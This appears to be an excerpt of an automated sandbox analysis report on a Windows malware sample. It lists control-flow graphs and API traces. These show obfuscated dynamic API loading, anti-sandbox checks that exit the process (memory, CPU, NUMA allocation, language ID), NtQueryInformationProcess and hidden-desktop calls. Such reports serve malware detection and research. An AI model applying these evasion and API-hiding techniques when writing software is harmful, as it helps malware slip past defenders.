                              control_flow_graph 2125 3b6390-3b63bd GetPEB 2126 3b65c3-3b6623 LoadLibraryA * 5 2125->2126 2127 3b63c3-3b65be call 3b62f0 GetProcAddress * 20 2125->2127 2128 3b6638-3b663f 2126->2128 2129 3b6625-3b6633 GetProcAddress 2126->2129 2127->2126 2131 3b666c-3b6673 2128->2131 2132 3b6641-3b6667 GetProcAddress * 2 2128->2132 2129->2128 2134 3b6688-3b668f 2131->2134 2135 3b6675-3b6683 GetProcAddress 2131->2135 2132->2131 2137 3b6691-3b669f GetProcAddress 2134->2137 2138 3b66a4-3b66ab 2134->2138 2135->2134 2137->2138 2139 3b66ad-3b66d2 GetProcAddress * 2 2138->2139 2140 3b66d7-3b66da 2138->2140 2139->2140
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00F21638), ref: 003B63E9
                              • GetProcAddress.KERNEL32(76210000,00F21740), ref: 003B6402
                              • GetProcAddress.KERNEL32(76210000,00F21758), ref: 003B641A
                              • GetProcAddress.KERNEL32(76210000,00F21650), ref: 003B6432
                              • GetProcAddress.KERNEL32(76210000,00F28AE8), ref: 003B644B
                              • GetProcAddress.KERNEL32(76210000,00F15288), ref: 003B6463
                              • GetProcAddress.KERNEL32(76210000,00F15108), ref: 003B647B
                              • GetProcAddress.KERNEL32(76210000,00F21698), ref: 003B6494
                              • GetProcAddress.KERNEL32(76210000,00F217D0), ref: 003B64AC
                              • GetProcAddress.KERNEL32(76210000,00F21788), ref: 003B64C4
                              • GetProcAddress.KERNEL32(76210000,00F217A0), ref: 003B64DD
                              • GetProcAddress.KERNEL32(76210000,00F15128), ref: 003B64F5
                              • GetProcAddress.KERNEL32(76210000,00F217B8), ref: 003B650D
                              • GetProcAddress.KERNEL32(76210000,00F214E8), ref: 003B6526
                              • GetProcAddress.KERNEL32(76210000,00F14FE8), ref: 003B653E
                              • GetProcAddress.KERNEL32(76210000,00F21500), ref: 003B6556
                              • GetProcAddress.KERNEL32(76210000,00F21518), ref: 003B656F
                              • GetProcAddress.KERNEL32(76210000,00F14F88), ref: 003B6587
                              • GetProcAddress.KERNEL32(76210000,00F21800), ref: 003B659F
                              • GetProcAddress.KERNEL32(76210000,00F151E8), ref: 003B65B8
                              • LoadLibraryA.KERNEL32(00F21878,?,?,?,003B1C03), ref: 003B65C9
                              • LoadLibraryA.KERNEL32(00F21890,?,?,?,003B1C03), ref: 003B65DB
                              • LoadLibraryA.KERNEL32(00F21818,?,?,?,003B1C03), ref: 003B65ED
                              • LoadLibraryA.KERNEL32(00F21830,?,?,?,003B1C03), ref: 003B65FE
                              • LoadLibraryA.KERNEL32(00F217E8,?,?,?,003B1C03), ref: 003B6610
                              • GetProcAddress.KERNEL32(75B30000,00F218A8), ref: 003B662D
                              • GetProcAddress.KERNEL32(751E0000,00F21848), ref: 003B6649
                              • GetProcAddress.KERNEL32(751E0000,00F21860), ref: 003B6661
                              • GetProcAddress.KERNEL32(76910000,00F28EA8), ref: 003B667D
                              • GetProcAddress.KERNEL32(75670000,00F150A8), ref: 003B6699
                              • GetProcAddress.KERNEL32(77310000,00F28AA8), ref: 003B66B5
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003B66CC
                              Strings
                              • NtQueryInformationProcess, xrefs: 003B66C1
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                              • Instruction ID: d708d6ba7dff03dd57e4a600e5e8ee6aabadb9cb64b0f01ebcf9bb4457367e27
                              • Opcode Fuzzy Hash: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                              • Instruction Fuzzy Hash: 5DA15DB5A11A00DFD754DF64EC8CE263BB9F7A8740304851AE956E3360EB34A808FB60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2141 3b1bf0-3b1c0b call 392a90 call 3b6390 2146 3b1c1a-3b1c27 call 392930 2141->2146 2147 3b1c0d 2141->2147 2151 3b1c29-3b1c2f lstrcpy 2146->2151 2152 3b1c35-3b1c63 2146->2152 2148 3b1c10-3b1c18 2147->2148 2148->2146 2148->2148 2151->2152 2156 3b1c6d-3b1c7b GetSystemInfo 2152->2156 2157 3b1c65-3b1c67 ExitProcess 2152->2157 2158 3b1c7d-3b1c7f ExitProcess 2156->2158 2159 3b1c85-3b1ca0 call 391030 call 3910c0 GetUserDefaultLangID 2156->2159 2164 3b1cb8-3b1cca call 3b2ad0 call 3b3e10 2159->2164 2165 3b1ca2-3b1ca9 2159->2165 2171 3b1ccc-3b1cde call 3b2a40 call 3b3e10 2164->2171 2172 3b1ce7-3b1d06 lstrlen call 392930 2164->2172 2165->2164 2166 3b1cb0-3b1cb2 ExitProcess 2165->2166 2171->2172 2185 3b1ce0-3b1ce1 ExitProcess 2171->2185 2177 3b1d08-3b1d0d 2172->2177 2178 3b1d23-3b1d40 lstrlen call 392930 2172->2178 2177->2178 2180 3b1d0f-3b1d11 2177->2180 2186 3b1d5a-3b1d7b call 3b2ad0 lstrlen call 392930 2178->2186 2187 3b1d42-3b1d44 2178->2187 2180->2178 2183 3b1d13-3b1d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 3b1d9a-3b1db4 lstrlen call 392930 2186->2193 2194 3b1d7d-3b1d7f 2186->2194 2187->2186 2188 3b1d46-3b1d54 lstrcpy lstrcat 2187->2188 2188->2186 2199 3b1dce-3b1deb call 3b2a40 lstrlen call 392930 2193->2199 2200 3b1db6-3b1db8 2193->2200 2194->2193 2196 3b1d81-3b1d85 2194->2196 2196->2193 2198 3b1d87-3b1d94 lstrcpy lstrcat 2196->2198 2198->2193 2206 3b1e0a-3b1e0f 2199->2206 2207 3b1ded-3b1def 2199->2207 2200->2199 2201 3b1dba-3b1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2209 3b1e11 call 392a20 2206->2209 2210 3b1e16-3b1e22 call 392930 2206->2210 2207->2206 2208 3b1df1-3b1df5 2207->2208 2208->2206 2212 3b1df7-3b1e04 lstrcpy lstrcat 2208->2212 2209->2210 2215 3b1e30-3b1e66 call 392a20 * 5 OpenEventA 2210->2215 2216 3b1e24-3b1e26 2210->2216 2212->2206 2228 3b1e68-3b1e8a CloseHandle Sleep OpenEventA 2215->2228 2229 3b1e8c-3b1ea0 CreateEventA call 3b1b20 call 3affd0 2215->2229 2216->2215 2217 3b1e28-3b1e2a lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 3b1ea5-3b1eae CloseHandle ExitProcess 2229->2233
                              APIs
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21638), ref: 003B63E9
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21740), ref: 003B6402
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21758), ref: 003B641A
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21650), ref: 003B6432
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F28AE8), ref: 003B644B
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F15288), ref: 003B6463
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F15108), ref: 003B647B
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21698), ref: 003B6494
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F217D0), ref: 003B64AC
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21788), ref: 003B64C4
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F217A0), ref: 003B64DD
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F15128), ref: 003B64F5
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F217B8), ref: 003B650D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B1C2F
                              • ExitProcess.KERNEL32 ref: 003B1C67
                              • GetSystemInfo.KERNEL32(?), ref: 003B1C71
                              • ExitProcess.KERNEL32 ref: 003B1C7F
                                • Part of subcall function 00391030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                • Part of subcall function 00391030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                • Part of subcall function 00391030: ExitProcess.KERNEL32 ref: 00391058
                                • Part of subcall function 003910C0: GlobalMemoryStatusEx.KERNEL32 ref: 003910EA
                                • Part of subcall function 003910C0: ExitProcess.KERNEL32 ref: 00391114
                              • GetUserDefaultLangID.KERNEL32 ref: 003B1C8F
                              • ExitProcess.KERNEL32 ref: 003B1CB2
                              • ExitProcess.KERNEL32 ref: 003B1CE1
                              • lstrlen.KERNEL32(00F28C18), ref: 003B1CEE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1D15
                              • lstrcat.KERNEL32(00000000,00F28C18), ref: 003B1D1D
                              • lstrlen.KERNEL32(003C4B98), ref: 003B1D28
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D48
                              • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1D54
                              • lstrlen.KERNEL32(00000000), ref: 003B1D63
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D89
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1D94
                              • lstrlen.KERNEL32(003C4B98), ref: 003B1D9F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DBC
                              • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1DC8
                              • lstrlen.KERNEL32(00000000), ref: 003B1DD7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1E04
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                              • String ID:
                              • API String ID: 3366406952-0
                              • Opcode ID: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                              • Instruction ID: 18b11a7b9db51c08c13bcce16dd41c21157b242566a7026faa6985082c7abb0f
                              • Opcode Fuzzy Hash: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                              • Instruction Fuzzy Hash: 2371A131501A16AFDB22ABB0DC5DFBF7A79AF60705F450028FA06AA591DF30DD05DB60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2850 394a60-394afc RtlAllocateHeap 2867 394b7a-394bbe VirtualProtect 2850->2867 2868 394afe-394b03 2850->2868 2869 394b06-394b78 2868->2869 2869->2867
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00394AA2
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00394BB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 625f5340285d87f9147408177074ac64af23cb9aac2782633e90005779484e99
                              • Instruction ID: 8ba2530dcde0a6488c98b0233ccb72e1da0b9a0cb0e60914985f5731bc38d4ca
                              • Opcode Fuzzy Hash: 625f5340285d87f9147408177074ac64af23cb9aac2782633e90005779484e99
                              • Instruction Fuzzy Hash: 5231CE29B8023C769622EBEF4C67F9F6E55DF85BA0B02405AF548D71818BB15D01CBA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2A6F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2A76
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 003B2A8A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                              • Instruction ID: 6803c4045d84f989eb570572f6d232e9c1a553c43e14f5da9e4a4e2b48017651
                              • Opcode Fuzzy Hash: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                              • Instruction Fuzzy Hash: 50F0B4B5A40A04AFC700DF88DD49F9EBBBCF704B21F000216FA15E3680D774190486A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 3b66e0-3b66e7 634 3b6afe-3b6b92 LoadLibraryA * 8 633->634 635 3b66ed-3b6af9 GetProcAddress * 43 633->635 636 3b6c08-3b6c0f 634->636 637 3b6b94-3b6c03 GetProcAddress * 5 634->637 635->634 638 3b6cd2-3b6cd9 636->638 639 3b6c15-3b6ccd GetProcAddress * 8 636->639 637->636 640 3b6cdb-3b6d4a GetProcAddress * 5 638->640 641 3b6d4f-3b6d56 638->641 639->638 640->641 642 3b6de9-3b6df0 641->642 643 3b6d5c-3b6de4 GetProcAddress * 6 641->643 644 3b6f10-3b6f17 642->644 645 3b6df6-3b6f0b GetProcAddress * 12 642->645 643->642 646 3b6f19-3b6f88 GetProcAddress * 5 644->646 647 3b6f8d-3b6f94 644->647 645->644 646->647 648 3b6fc1-3b6fc8 647->648 649 3b6f96-3b6fbc GetProcAddress * 2 647->649 650 3b6fca-3b6ff0 GetProcAddress * 2 648->650 651 3b6ff5-3b6ffc 648->651 649->648 650->651 652 3b70ed-3b70f4 651->652 653 3b7002-3b70e8 GetProcAddress * 10 651->653 654 3b7152-3b7159 652->654 655 3b70f6-3b714d GetProcAddress * 4 652->655 653->652 656 3b715b-3b7169 GetProcAddress 654->656 657 3b716e-3b7175 654->657 655->654 656->657 658 3b71d3 657->658 659 3b7177-3b71ce GetProcAddress * 4 657->659 659->658
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00F15228), ref: 003B66F5
                              • GetProcAddress.KERNEL32(76210000,00F15088), ref: 003B670D
                              • GetProcAddress.KERNEL32(76210000,00F29070), ref: 003B6726
                              • GetProcAddress.KERNEL32(76210000,00F29028), ref: 003B673E
                              • GetProcAddress.KERNEL32(76210000,00F28FE0), ref: 003B6756
                              • GetProcAddress.KERNEL32(76210000,00F2DDF8), ref: 003B676F
                              • GetProcAddress.KERNEL32(76210000,00F1A658), ref: 003B6787
                              • GetProcAddress.KERNEL32(76210000,00F2DC60), ref: 003B679F
                              • GetProcAddress.KERNEL32(76210000,00F2DC78), ref: 003B67B8
                              • GetProcAddress.KERNEL32(76210000,00F2DC30), ref: 003B67D0
                              • GetProcAddress.KERNEL32(76210000,00F2DD38), ref: 003B67E8
                              • GetProcAddress.KERNEL32(76210000,00F152C8), ref: 003B6801
                              • GetProcAddress.KERNEL32(76210000,00F15248), ref: 003B6819
                              • GetProcAddress.KERNEL32(76210000,00F15268), ref: 003B6831
                              • GetProcAddress.KERNEL32(76210000,00F152E8), ref: 003B684A
                              • GetProcAddress.KERNEL32(76210000,00F2DD80), ref: 003B6862
                              • GetProcAddress.KERNEL32(76210000,00F2DD50), ref: 003B687A
                              • GetProcAddress.KERNEL32(76210000,00F1A608), ref: 003B6893
                              • GetProcAddress.KERNEL32(76210000,00F15308), ref: 003B68AB
                              • GetProcAddress.KERNEL32(76210000,00F2DBD0), ref: 003B68C3
                              • GetProcAddress.KERNEL32(76210000,00F2DEA0), ref: 003B68DC
                              • GetProcAddress.KERNEL32(76210000,00F2DE58), ref: 003B68F4
                              • GetProcAddress.KERNEL32(76210000,00F2DC48), ref: 003B690C
                              • GetProcAddress.KERNEL32(76210000,00F15328), ref: 003B6925
                              • GetProcAddress.KERNEL32(76210000,00F2DEB8), ref: 003B693D
                              • GetProcAddress.KERNEL32(76210000,00F2DE10), ref: 003B6955
                              • GetProcAddress.KERNEL32(76210000,00F2DD68), ref: 003B696E
                              • GetProcAddress.KERNEL32(76210000,00F2DBE8), ref: 003B6986
                              • GetProcAddress.KERNEL32(76210000,00F2DCA8), ref: 003B699E
                              • GetProcAddress.KERNEL32(76210000,00F2DD98), ref: 003B69B7
                              • GetProcAddress.KERNEL32(76210000,00F2DCD8), ref: 003B69CF
                              • GetProcAddress.KERNEL32(76210000,00F2DD08), ref: 003B69E7
                              • GetProcAddress.KERNEL32(76210000,00F2DCF0), ref: 003B6A00
                              • GetProcAddress.KERNEL32(76210000,00F1FD48), ref: 003B6A18
                              • GetProcAddress.KERNEL32(76210000,00F2DC90), ref: 003B6A30
                              • GetProcAddress.KERNEL32(76210000,00F2DD20), ref: 003B6A49
                              • GetProcAddress.KERNEL32(76210000,00F15008), ref: 003B6A61
                              • GetProcAddress.KERNEL32(76210000,00F2DDB0), ref: 003B6A79
                              • GetProcAddress.KERNEL32(76210000,00F15028), ref: 003B6A92
                              • GetProcAddress.KERNEL32(76210000,00F2DDC8), ref: 003B6AAA
                              • GetProcAddress.KERNEL32(76210000,00F2DDE0), ref: 003B6AC2
                              • GetProcAddress.KERNEL32(76210000,00F150C8), ref: 003B6ADB
                              • GetProcAddress.KERNEL32(76210000,00F15048), ref: 003B6AF3
                              • LoadLibraryA.KERNEL32(00F2DC00,003B051F), ref: 003B6B05
                              • LoadLibraryA.KERNEL32(00F2DCC0), ref: 003B6B16
                              • LoadLibraryA.KERNEL32(00F2DE28), ref: 003B6B28
                              • LoadLibraryA.KERNEL32(00F2DE40), ref: 003B6B3A
                              • LoadLibraryA.KERNEL32(00F2DE70), ref: 003B6B4B
                              • LoadLibraryA.KERNEL32(00F2DC18), ref: 003B6B5D
                              • LoadLibraryA.KERNEL32(00F2DE88), ref: 003B6B6F
                              • LoadLibraryA.KERNEL32(00F2E008), ref: 003B6B80
                              • GetProcAddress.KERNEL32(751E0000,00F15068), ref: 003B6B9C
                              • GetProcAddress.KERNEL32(751E0000,00F2DF90), ref: 003B6BB4
                              • GetProcAddress.KERNEL32(751E0000,00F28B78), ref: 003B6BCD
                              • GetProcAddress.KERNEL32(751E0000,00F2DFF0), ref: 003B6BE5
                              • GetProcAddress.KERNEL32(751E0000,00F150E8), ref: 003B6BFD
                              • GetProcAddress.KERNEL32(73940000,00F1A680), ref: 003B6C1D
                              • GetProcAddress.KERNEL32(73940000,00F153A8), ref: 003B6C35
                              • GetProcAddress.KERNEL32(73940000,00F1A6A8), ref: 003B6C4E
                              • GetProcAddress.KERNEL32(73940000,00F2DF18), ref: 003B6C66
                              • GetProcAddress.KERNEL32(73940000,00F2DF60), ref: 003B6C7E
                              • GetProcAddress.KERNEL32(73940000,00F156E8), ref: 003B6C97
                              • GetProcAddress.KERNEL32(73940000,00F153C8), ref: 003B6CAF
                              • GetProcAddress.KERNEL32(73940000,00F2DF00), ref: 003B6CC7
                              • GetProcAddress.KERNEL32(753A0000,00F15588), ref: 003B6CE3
                              • GetProcAddress.KERNEL32(753A0000,00F155A8), ref: 003B6CFB
                              • GetProcAddress.KERNEL32(753A0000,00F2DFC0), ref: 003B6D14
                              • GetProcAddress.KERNEL32(753A0000,00F2DFA8), ref: 003B6D2C
                              • GetProcAddress.KERNEL32(753A0000,00F15368), ref: 003B6D44
                              • GetProcAddress.KERNEL32(76310000,00F1A888), ref: 003B6D64
                              • GetProcAddress.KERNEL32(76310000,00F1A6D0), ref: 003B6D7C
                              • GetProcAddress.KERNEL32(76310000,00F2DFD8), ref: 003B6D95
                              • GetProcAddress.KERNEL32(76310000,00F155C8), ref: 003B6DAD
                              • GetProcAddress.KERNEL32(76310000,00F155E8), ref: 003B6DC5
                              • GetProcAddress.KERNEL32(76310000,00F1A798), ref: 003B6DDE
                              • GetProcAddress.KERNEL32(76910000,00F2E038), ref: 003B6DFE
                              • GetProcAddress.KERNEL32(76910000,00F154A8), ref: 003B6E16
                              • GetProcAddress.KERNEL32(76910000,00F28C38), ref: 003B6E2F
                              • GetProcAddress.KERNEL32(76910000,00F2DF48), ref: 003B6E47
                              • GetProcAddress.KERNEL32(76910000,00F2E050), ref: 003B6E5F
                              • GetProcAddress.KERNEL32(76910000,00F15348), ref: 003B6E78
                              • GetProcAddress.KERNEL32(76910000,00F15608), ref: 003B6E90
                              • GetProcAddress.KERNEL32(76910000,00F2DF78), ref: 003B6EA8
                              • GetProcAddress.KERNEL32(76910000,00F2E020), ref: 003B6EC1
                              • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 003B6ED7
                              • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 003B6EEE
                              • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 003B6F05
                              • GetProcAddress.KERNEL32(75B30000,00F15668), ref: 003B6F21
                              • GetProcAddress.KERNEL32(75B30000,00F2E068), ref: 003B6F39
                              • GetProcAddress.KERNEL32(75B30000,00F2E080), ref: 003B6F52
                              • GetProcAddress.KERNEL32(75B30000,00F2DED0), ref: 003B6F6A
                              • GetProcAddress.KERNEL32(75B30000,00F2DF30), ref: 003B6F82
                              • GetProcAddress.KERNEL32(75670000,00F15628), ref: 003B6F9E
                              • GetProcAddress.KERNEL32(75670000,00F153E8), ref: 003B6FB6
                              • GetProcAddress.KERNEL32(76AC0000,00F156C8), ref: 003B6FD2
                              • GetProcAddress.KERNEL32(76AC0000,00F2DEE8), ref: 003B6FEA
                              • GetProcAddress.KERNEL32(6F4E0000,00F15548), ref: 003B700A
                              • GetProcAddress.KERNEL32(6F4E0000,00F15388), ref: 003B7022
                              • GetProcAddress.KERNEL32(6F4E0000,00F15408), ref: 003B703B
                              • GetProcAddress.KERNEL32(6F4E0000,00F2DAB0), ref: 003B7053
                              • GetProcAddress.KERNEL32(6F4E0000,00F15488), ref: 003B706B
                              • GetProcAddress.KERNEL32(6F4E0000,00F15428), ref: 003B7084
                              • GetProcAddress.KERNEL32(6F4E0000,00F15648), ref: 003B709C
                              • GetProcAddress.KERNEL32(6F4E0000,00F15508), ref: 003B70B4
